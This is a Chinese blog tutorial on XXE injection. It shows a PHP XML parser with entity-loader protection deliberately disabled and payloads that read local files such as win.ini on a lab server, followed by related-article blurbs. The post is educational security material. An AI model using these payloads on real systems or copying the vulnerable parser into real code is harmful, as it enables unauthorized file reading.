xxe漏洞学习与实战

最新推荐文章于 2024-08-29 18:57:33 发布
最新推荐文章于 2024-08-29 18:57:33 发布
阅读量311 收藏 1
点赞数
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/108014787
版权

xxe漏洞学习与实战

文章目录

一、Xxe漏洞学习

Xxe是一种针对xml终端的攻击,想要实施这种攻击,需要在xml的payload包含外部实体声明,且服务器本身允许实体扩展。这样就能读取web服务器文件系统,通过unc路径访问远程文件,或者http/https连接主机。

Jiexi.php

<?php
    header("content-type:text/html;charset=utf-8");
	//libxml_disable_entity_loader(true);
	$str = @file_get_contents('php://input');
	$xml = simplexml_load_string($str,'SimpleXMLElement', LIBXML_NOCDATA);
	echo "<pre>";
	var_dump($xml);
?>

Book.xml

<books>
<book>
<author>Jack Herrington</author>
<title>PHP Hacks</title>
<publisher>O'Reilly</publisher>
</book>
<book>
<author>Jack Herrington</author>
<title>Podcasting Hacks</title>
<publisher>O'Reilly</publisher>
</book>
</books>

<?php
$doc = new DOMDocument('1.0', 'utf8');
$doc = @file_get_contents('php://input');
$xml = simplexml_load_string($doc);
echo "<pre>";
var_dump($xml)
//$doc->load( 'books.xml' );
//echo "$doc";
//xml_set_external_entity_ref_handler($doc, "ext_ent_handler");
$doc = DOMDocument::loadXML($doc);
$books = $doc->getElementsByTagName( "book" );
foreach( $books as $book )
{
$authors = $book->getElementsByTagName( "author" );
$author = $authors->item(0)->nodeValue;

$publishers = $book->getElementsByTagName( "publisher" );
$publisher = $publishers->item(0)->nodeValue;

$titles = $book->getElementsByTagName( "title" );
$title = $titles->item(0)->nodeValue;

echo "$title - $author - $publisher\n";
echo "<br>";
}
?>

Payload
http://192.168.1.106:800/xxe/jiexi.php

<?xml version='1.0' encoding='UTF-8'?>
<students>
   <student>
      <name>xiaohei</name>
	  <age>20</age>
   </student>
</students>

在这里插入图片描述

二、Xxe漏洞实战

<?xml version='1.0' encoding='UTF-8'?>
      <!DOCTYPE a [<!ENTITY b SYSTEM 'file:///c:/xxx.txt'>]>
<students>
   <student>
   <w>&b;</w>
      <name>xiaohei</name>
	  <age>20</age>
   </student>
</students>

在这里插入图片描述
在这里插入图片描述

<?xml version='1.0' encoding='UTF-8'?>
      <!DOCTYPE a [<!ENTITY b SYSTEM 'file:///c:/windows/win.ini'>]>
<students>
   <student>
   <w>&b;</w>
      <name>xiaohei</name>
	  <age>20</age>
   </student>
</students>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三、我的公众号

后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

永不垂头
关注
专栏目录
Web安全XXE漏洞原理及实践学习
Continuejww的博客
12-12 1431
即XML外部实体注入漏洞。攻击者强制XML解析器去访问攻击者指定的资源内容(可能是系统上本地文件亦或是远程系统上的文件),导致可加载等危害。一句话概括:用户传入的XML被解析成实体执行。
记一次XXE渗透实战
qq_43998932的博客
09-21 694
0x00、XXE是什么? XXE也就是XML外部实体注入攻击。 0x01、什么是XML呢? 1.XML 指可扩展标记语言(EXtensible Markup Language) 2.XML 是一种标记语言,很类似 HTML 3.XML 的设计宗旨是传输数据,而非显示数据 4.XML 标签没有被预定义。您需要自行定义标签。 5.XML 被设计为具有自我描述性。 6.XML 是 W3C 的推荐标准 0x03、XXE实体注入原理 有了XML实体,关键字’SYSTEM’会令XML解析器从URI中读取内容,并允许
XXE 漏洞实战
qq_46540840的博客
07-25 574
XXE 漏洞实战 补充知识 namp使用 特点 ​ 主机探测:探测网络上的主机,如列出响应TCP,ICMP请求,开放特别端口的主机 ​ 端口扫描: 探测目标主机所开放的端口 ​ 版本探测:探测目标主机的网络服务,其服务名称及版本号 常用命令 nmap -sP 192.168.0.1/24 扫描目标地址所在的C段在线情况 nmap -O 识别目标地址的操作系统 nmap -sV 检测目标地址开放的端口对应的服务版本信息 nmap sn 检测主机,不进行端口扫描 扫描某一目标地址的端
XXE 漏洞及案例实战
来日可期的博客
09-24 2892
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
XXE漏洞详解(三)——XXE漏洞实际运用
永远是少年
12-23 809
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE漏洞详解(三)——XXE漏洞实际运用。 一、XXE漏洞简介 二、XXE漏洞pikachu靶场介绍 三、XXE漏洞pikachu靶场实战 (一)利用XXE漏洞读取文件 (二)利用XXE漏洞进行内网探测
xxe漏洞实战
weixin_30782331的博客
08-03 576
前言 在 2017 年版的 OWASP TOP 10, xxe 强势上位。 本文对网上常见的利用方式做一个汇总 正文 测试环境 win10 phpstudy 测试代码: <?php $data = file_get_contents('php://input'); echo $data; $dom = new DOMDocument(); $dom->loadXML($dat...
听补天漏洞审核专家实战讲解XXE漏洞
dfdhxb995397的博客
08-25 291
对于将“挖洞”作为施展自身才干、展现自身价值方式的白 帽 子来说,听漏洞审核专家讲如何挖掘并验证漏洞,绝对不失为一种快速的成长方式! XXE Injection(XML External Entity Injection),是一种容易被忽视,但危害巨大的漏洞。它是一种隐蔽并且经常被忽视的漏洞,可以利用XML外部实体加载注入,执行不可预控的代码。 据补天数据统计,每100个漏洞里,有0...
XXE漏洞研究分析
chenwan8737的博客
07-31 337
近期在做个基础的web常见漏洞的ppt,主要参考OWASP TOP 10 2017RC2,此版本中增加了XXE攻击,所以自己简单的研究了下XXE攻击,做个笔记。XXE(XML External Entity)XML外部实体,当前端和后端通信数据采用xml,可传入xml外部实体,利...
XXE靶机实战-vuluhub系列(三)
PANDA墨森的博客
06-28 489
这是vulnhub靶机系列文章的第三篇,具体下载连接去vulnhub或者百度、谷歌搜搜就好...开始进入主题 首先xxe是xml外部实体注入漏洞,可通过进入外部实体进行攻击,例如读取敏感文件,扫描端口等等,实战中感觉出现几率不是很大,唯一一次遇到是某司面试题,当时团队小伙伴遇到了,运气爆棚的我找到了xxe漏洞,顺道内部交流了下hahaha,不扯淡了,开始吧... 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13183950.html #001寻找靶机ip ..
XXE漏洞-基础篇实验过程记录及体会
lm19770429的专栏
11-18 725
实验环境用的是合天网安实验室 基础知识 1. 什么是XML xml: eXtensibleMarkup Language,可扩展标记语言,使用简单的标记来描述数据。 xml是一种非常灵活的语言,类似于HTML语言,但是并没有固定的标签,所有的标签都可以自定义,其设计的宗旨是传输数据,而不是像HTML一样显示数据。 xml不会做任何事情,它是被设计用来结构化、存储以及传输信息,也就是xml文件所携带的信息,需要被其他的语言或者程序来解析,才能发挥作用。 2....
xxe漏洞靶场实战通过
最新发布
m0_73771249的博客
08-29 455
1、用nmap扫描C段,找到靶场 2、打开网址,查看robots.txt文件 3、发现有两个目录,分别查看发现一个登录页面 4、使用BP抓包,发现是xml类型 5、尝试查看/etc/passwd 文件,在尝试查看xxe.php文件,发现是编码后的,尝试解码后发现没有什么用处 6、再查看robots.txt中发现的admin.php,发现也是编码后的,解码后发现了用户名和md5编码后的密码,尝试解码,然后登录 7、登录后发现发现页面有个flag
XML外部实体攻击原理以及实战XXE)(1)
Ba1_Ma0的博客
04-21 1990
extensible markup language(XML)类似于HTML的可扩展的标记语言,但主要区别在于,HTML是关于数据表示的,但是XML是关于数据传输的,XML是可读的,他被用在很多地方,比如API,UI布局,android应用程序配置文件,RSS等
xxe漏洞之——漏洞复现
wsnbbz的博客
03-04 1468
漏洞介绍 XXE全称XML External Entity Injection,也就是XML外部实体注入攻击,漏洞是对非安全的外部实体数据进行处理时引发的安全问题。要了解XXE,就必须懂得XML的一些规则。 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档...
Web安全XXE漏洞
qq_42751192的博客
08-19 547
XML 指可扩展标记语言(EXtensible Markup Language)。XML 是一种很像 HTML 的标记语言。XML 的设计宗旨是传输数据,而不是显示数据。XML 标签没有被预定义。您需要自行定义标签。XML 被设计为具有自我描述性。
XXE漏洞复现
春日野穹
10-23 3050
引言~ XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 实验环境~ PHP版本:5.4.45 中间件:apache 复现平台:皮卡丘漏洞练习平台 libXML编译版本:2.7.8 libxm...
XXE漏洞
qq_44768719的博客
11-04 329
** XXE漏洞 ** 这里是引用 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 ...
XXE漏洞及复现
weixin_45643931的博客
08-20 810
XXE漏洞 全称XML External Entity Injection即XML外部实体注入漏洞 由名字可以知道 这是关于XML的漏洞 SQL注入是在注入点处输入SQL恶意语法执行达到自己的目的 那么XXE应该也是类似的 在可以解析XML的地方(比如一个输入框等处)提交XML的恶意代码来执行 ⅩXE漏洞发生在应用序解析ⅩML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 ...
windows文件读取 xxe_Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行……...
weixin_39551993的博客
12-22 667
原标题:Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行…… 你的Web应用是否存在XXE漏洞? 如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它。在去年的几次web应用渗透中,我们就成功的利用了好几回。什么是XXE“简单来说,XXE就是XML...
从一道题目学习XXE漏洞
蚁景网安学院
03-01 547
本文涉及知识点实操练习:XXE漏洞分析与实践 (通过该实验了解XXE漏洞的基础知识及演示实践。) 0x01.xxe漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 0x02.xml定
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值